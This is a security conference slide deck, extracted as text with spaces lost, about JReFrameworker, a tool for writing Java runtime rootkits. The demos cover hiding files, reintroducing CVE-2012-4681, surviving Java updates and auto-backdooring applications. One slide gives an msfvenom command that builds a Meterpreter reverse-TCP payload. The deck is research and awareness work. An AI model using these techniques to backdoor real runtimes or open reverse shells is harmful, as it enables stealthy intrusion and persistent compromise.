43
JReFrameworker: One Year Later ben-holland.com (daedared) jreframeworker.com
JReFrameworker:OneYearLaterben-holland.com (daedared)
jreframeworker.com
I♥ Derbycon
• Derbycon 3.0:Myfirstconever!Lovedit.• Derbycon 4.0:ABugorMalware?Catastrophicconsequenceseitherway.• Howwouldyoudetectthedifferencebetweenaspellcheckerandaspellwrecker (invertedspellchecker)?
I♥ Derbycon
• Derbycon 3.0:Myfirstconever!Lovedit.• Derbycon 4.0:ABugorMalware?Catastrophicconsequenceseitherway.
I♥ Derbycon
• Derbycon 3.0:Myfirstconever!Lovedit.• Derbycon 4.0:ABugorMalware?Catastrophicconsequenceseitherway.• Howwouldyoudetectthedifferencebetweenaspellcheckerandaspellwrecker (invertedspellchecker)?• ManagedCodeRootkitswerepresentedforC#andJavain2010,butnoreliabletoolsexistedformetoinjectmypayloadintheJVML
I♥ Derbycon
• Derbycon 3.0:Myfirstconever!Lovedit.• Derbycon 4.0:ABugorMalware?Catastrophicconsequenceseitherway.• DEFCON24:DevelopingManagedCodeRootkitsfortheJavaRuntimeEnvironment.• Derbycon 7.0:JReFrameworker:OneYearLater.• BringingitfullcircleJ
Overview(showallthedemos!)
• ManagedCodeRootkits• Demo1:HelloWorld
• JReFrameworker• Demo2:HiddenFileRootkit
• PayloadDropper• Demo3:PostExploitationwithMetasploit
• AdvancedPersistence• Demo4:SurvivingJavaUpdates
• IncrementalBuilding• Demo5:RestoringCVE-2012-4681
• ProgramAnalysisIntegrations• Demo6:AutomaticBackdoors• Demo7:“MinorityReport”Development• Demo8:ContextAwareMalware
Demo1:EvilJava?
EvilRuntimeLibraries(.jarfiles)
ManagedCodeLanguages
JavaSourceCode(.javafiles)
JavaCompiler
JavaBytecode(.classfiles)
JavaApplication(.jarfile)
OperatingSystem(Windows,Mac,Linux)
JavaVirtualMachine
RuntimeLibraries(.jarfiles)
JavaApplication(.jarfile)
WriteOnce,RunAnywhere?Compatibility?
JavaVirtualMachine
EvilRuntimeLibraries(.jarfiles)
ManagedCodeRootkits
JavaSourceCode(.javafiles)
JavaCompiler
JavaBytecode(.classfiles)
JavaApplication(.jarfile)
OperatingSystem(Windows,Mac,Linux)
JavaVirtualMachine
JavaApplication(.jarfile)
WriteOnce,RunAnywhere?
Background
• Notreallyanewidea…• Manipulatingalibraryaffectsallapplicationsusingthelibrary• HadpreviouslybeendemonstratedonC#andJava(2010)• RecentsurgeinsimilarresearchforPythonlibraries
• Outofsightoutofmind• Codereviews/auditsdon’ttypicallyauditruntimes• Maybeoverlookedbyforensicinvestigators
• JVMruntimeisfullyfeatured• ObjectOrientedprogramming• Platformindependentportablerootkits(ifdoneright)
• DEFCON24:JReFrameworker(initialrelease)• Lowersthebarriertoentry!(developMCRsinJavasource,minimalskillz required)• Anawarenessprojectformanagedcoderootkits
ModifyingtheRuntimeHowcanwemodifytheruntimeforgood evilpurposes?
BytecodeIntermediate
Representations DecompiledSource
Difficult StillTricky IdealbutUnreliable
BasicIdea:Overview
• Itiseasytowritesourcecode• Itseasytoconvertsourcecodetobytecode(compiler!)• Itsrelativelyeasytoinject,replace,merge,deletewholemethods
• Source:http://asm.ow2.org/current/asm-transformations.pdf
• Aclasscontainsdeclarationsoffieldsandmethods• All“code”(assignments,methodcalls,etc.)mustbeinamethodbody• Ifwecandeclarefieldsandadd/replace/merge/deletemethodswecancovermostbytecodemanipulationusecasesbyonlywritingsourcecode• Tradeoff:Makingsmalleditswithinamethodrequiresrewritingthewholemethod…
BasicIdea:AddCode
UserClass OriginalClass
Class:java.io.File
Method:exists(){...}
Method:getName(){...}
Class:example.MyFileextendsjava.io.File
AddMethod:foo(){...}
Method:foo(){...}
UnavailableSourceUserSource
BasicIdea:ReplaceCode
UserClass OriginalClass
Class:java.io.File
Method:exists(){...}
Method:getName(){...}
Class:example.MyFileextendsjava.io.File
AddMethod:exists(){...}
UnavailableSourceUserSource
BasicIdea:DeleteCode
UserClass OriginalClass
Class:java.io.File
Method:exists(){...}
Method:getName(){...}
Class:example.MyFileextendsjava.io.File
DeleteMethod:exists();
UnavailableSourceUserSource
BasicIdea:Merge(hook)Code
UserClass OriginalClass
Class:java.io.File
Method:exists(){...}
Method:exists(){//hookbeforeherereturnold_exists();}
Class:example.MyFileextendsjava.io.File
MergeMethod:exists(){//hookbeforeherereturnsuper.exists();}
UnavailableSourceUserSource
Method:old_exists(){...}
JReFrameworker
• WriterootkitsinJavasource!• Modificationbehaviorsdefinedwithcodeannotations• DevelopanddebuginEclipseIDE• Exploit"modules"areEclipseJavaprojects• Exportablepayloaddroppers• Bytecode injectionsarecomputedonthefly
• Free+OpenSource(MITLicense):jreframeworker.com
JReFrameworker
JReFrameworkerAnnotations
• JavaAnnotations:“syntacticmetadatathatcanbeaddedto Java sourcecode”(Wikipedia)• 3TypesofAnnotations• Sourcecodeonly(doesnotendupincompiledbinary)• Codeonly(includedinbytecode,butareignoredbyJVM)• Runtime(includedinbytecodeandareavailablethroughreflectionatruntime)
• Idea:Useannotationstotemporarilymarkpartsoftheusermadebytecodeforthebytecodemanipulationengine
BasicJReFrameworkerAnnotations
(InsertsorReplaces) (PreservesandReplaces)
Demo2:HiddenFileModule
• JReFrameworker• DevelopanddebugmodificationsinafamiliarIDE(Eclipse)• Specializedbytecodemanipulationengine
• JReFrameworkerModules• EclipseprojectofannotatedJavasourcecode• Alistoftargetruntimes/librariestobemodified• Canbeusedtoexportapayloaddroppertocomputeontheflybytecodeinjections
Demo3:Post-Exploitation
• Wehavedevelopedandtestedourhiddenfilemodule.Howdowedeploythechangetothevictim’sruntime?• Mustberoot/administratorinmostcases(dependingwheretheruntimeisinstalled)• Example:C:\ProgramFiles(x86)\Java\jre8
RestofThisTalk:JReFrameworkerNewShiny
• Improvementstomanipulationcapabilities• Improvementstodevelopmentworkflow• Improvementstopostexploitationprocess• Improvementstopersistence• Progresstowardsautomaticmanipulations
JReFrameworker
BasicBugFixes/Improvements• JarResources
• Preservingstartupconfigurationsandresourcefiles• DealingwithsignedJars(unsign ifnecessary,resignwithkeystore)
• Annotations• Supportformultipleannotations• Replacedmethodsarenowpurgedcorrectly• @MergeMethod annotationsupportforstaticmethods
• Modules• Symbolic/relativepaths(portableprojects)• Supportformanipulatingapplications
• Generalworkflowissues• Modificationstoruntimeandapplicationsarenowconceptuallythesame
• RegressionTesting(JUnit)!• Doublesasworkingexamplesofannotations• Helptopreventfuturebugs
DropperImprovements
Demo4:SurvivingJavaUpdates
• Challenge:AnewversionofJavagetsreleased.Theusersrunstheinstallerandinstallsanewdefaultruntime.Nowwhat?
//removescom.example.MyClass fromtarget@PurgeTypepublicclassBuildextendsMyClass {… }
AnnotationImprovements(Purge)
PurgeType @PurgeTypeMethod @PurgeMethodField @PurgeField
• WhatifIjustwantsomethinggone?
//removescom.example.MyClass fromtarget@PurgeType(type="com.example.MyClass")publicclassBuild{… }
AnnotationImprovements(Visibility/Finality)
Visibility FinalityType @DefineTypeVisibility @DefineTypeFinalityMethod @DefineMethodVisibility @DefineMethodFinalityField @DefineFieldVisibility @DefineFieldFinality
• WhatifIcan’taccessatype/method/field?
//removesfinalmodifierfromcom.example.MyUnextensibleClass@DefineTypeFinality(type="com.example.MyUnextensibleClass",finality=false)publicclassPrebuild{}
AnnotationImprovements(BuildPhases)
• WhatifIneedtomakechangesinsteps?• Phasesprogressfromphase1ton
//phase1removesfinalmodifierfromcom.example.MyUnextensibleClass@DefineTypeFinality(phase=1,type="com.example.MyUnextensibleClass",finality=false)publicclassPrebuild{}
//phase2definesatypethatextendsapreviouslyfinaltype@MergeType(phase=2)publicclassMyClass extendsMyUnextensibleClass {… }//compileerroruntilphase1completes
IncrementalBuilder
• CleanProject/FullBuild1. Letbuildphasei=12. Compileallsourceswithoutcompilererrors3. Manipulatetargetforphasei4. Updateclasspath andrecompilesources5. Repeatfromstep2
• IncrementalBuilder1. Foreachadd,modify,deletefilechangeset
• Revertbuildphasetofirstimpactedbuildphase2. Rebuildfromrevertedbuildphaseandrepeatuntilnonewchanges
Derbycon 4.0:RefactoringCVE-2012-4681
• “AllowsremoteattackerstoexecutearbitrarycodeviaacraftedappletthatbypassesSecurityManager restrictions…”• CVECreatedAugust27th2012(~2yearsold…)• github.com/benjholla/CVE-2012-4681-Armoring
DEFCON24:RefactoringCVE-2012-4681
• “AllowsremoteattackerstoexecutearbitrarycodeviaacraftedappletthatbypassesSecurityManager restrictions…”• CVECreatedAugust27th2012(~4yearsold!)• github.com/benjholla/CVE-2012-4681-Armoring
Demo5:The“ReverseBug”Patch
• FixedinJava7update7• “Unfixing”CVE-2012-4681inJava8• com.sun.beans.finder.ClassFinder
• RemovecallstoReflectUtil.checkPackageAccess(…)• com.sun.beans.finder.MethodFinder
• RemovecallstoReflectUtil.isPackageAccessible(…)• sun.awt.SunToolkit
• RestoregetField(...)method
• Unobfuscated vulnerability gets0/56onVirusTotal
Demo6:TowardsAutomaticBackdoors
BasicSteps:1. Findandhookmainmethod2. Spawnanewthread3. ExecuteMeterpreterreverseTCPJavapayload
Demo6:TowardsAutomaticBackdoors
• Phase1:AddMeterpreterJavaPayload• https://github.com/rapid7/metasploit-payloads/blob/master/java/javapayload/src/main/java/metasploit/Payload.java
…
Demo6:TowardsAutomaticBackdoors
• Phase2:Defineanewthreadforpayloadandconfigureproperties• Equivalent:msfvenom -fraw-pjava/meterpreter/reverse_tcpLHOST=172.16.189.167LPORT=4444-o~/Desktop/meterpreter.jar
Demo6:TowardsAutomaticBackdoors
• Phase3:Spawnnewthreadwithpayloadandcalloriginalapplicationentrypoint• Works,butseemstobeanissuewithjavameterpreter payloadinlatestrelease• https://github.com/rapid7/meterpreter/issues/179
• Thisentireprocesscaneasilybeautomated,butisthisreallythatinteresting/useful?
Onlyvariable
Demo7:VisuallyManipulatingApplications
• NewFeatures• JavaPoetsourcecodegeneration(https://github.com/square/javapoet)• Atlasprogramanalysis(http://www.ensoftcorp.com/atlas/)
• Goal:HardeningJD-GUIdecompiler soitwon’tdecompileitself• Challenge:Howdowefindtheparticularcodewewanttomanipulate?• Challenge:JD-GUIisreleasedunderGPLv3License,butsourceisnotpublic…<snarkycommentabouthavingadecompiler>
Demo8:ContextAwareMalware
• Insteadofmodifyingtheapplication,couldwemodifytheJVMruntimetopreventJD-GUIfromdecompilingruntime?
• Idea:Usereflection,stacktraces,examinationofcallerparameters,etc.todeterminehowtobehaveforagivencallingcontext.• Similartoaspectorientprogramming• Flashback:DEFCONJReFrameworkerDOOMDemo
Demo9:KitchenSink
ContrivedScenario:• JavaDeveloper’sEclipseisactingweird…helpingmaketypos…pixelatingimages…• Suspectrt.jar iscompromised• Decompilert.jar anddecompiler crashes• Decompiledecompiler anddecompiler says:Nope.• GetsfrustratedandupdatesJavatolatestversion• Problemssomehowpersist…• Goesinsane• Downloadsanewprogramminglanguages…storyendshere?
ProjectRoadmap
• StudysupportingotherJVMlanguages(JVMBytecodeisn’tjustJava)• JVMSpecific:Java,Scala,Clojure,Groovy,Ceylon,Fortess,Gosu,Kotlin…• PortedLanguages:JRuby,Jython,Smalltalk,Ada,Scheme,REXX,Prolog,Pascal,CommonLISP…• Interestingwork:https://github.com/Storyyeller/Krakatau
ProjectRoadmap
• Findandfixthebugs!• Betterprogramanalysisintegrations• CodeGenerationWizards
• Moreinterestingmodules• Youcanhelpwiththis!• https://github.com/JReFrameworker/modules
• Androidsupportisalreadyinthepipeline• APKà DEXà JARà JReFrameworkerà JARà DEXà APK
ToolRelease
• Tool:https://jreframeworker.com/install• MITLicense• 100%OpenSource• EclipsePluginwithUpdateSite(Eclipse>Help>InstallNewPlugins…)
• Tutorials:https://jreframeworker.com/tutorials• Walkthroughsofhelloworld,hiddenfile,andMetasploit payloaddeployment
• Giveitatry.Sendmefeedback!• Support:https://github.com/JReFrameworker/JReFrameworker/issues• Email:[email protected]
ThankYou!
• Questions?
ben-holland.comjreframeworker.com
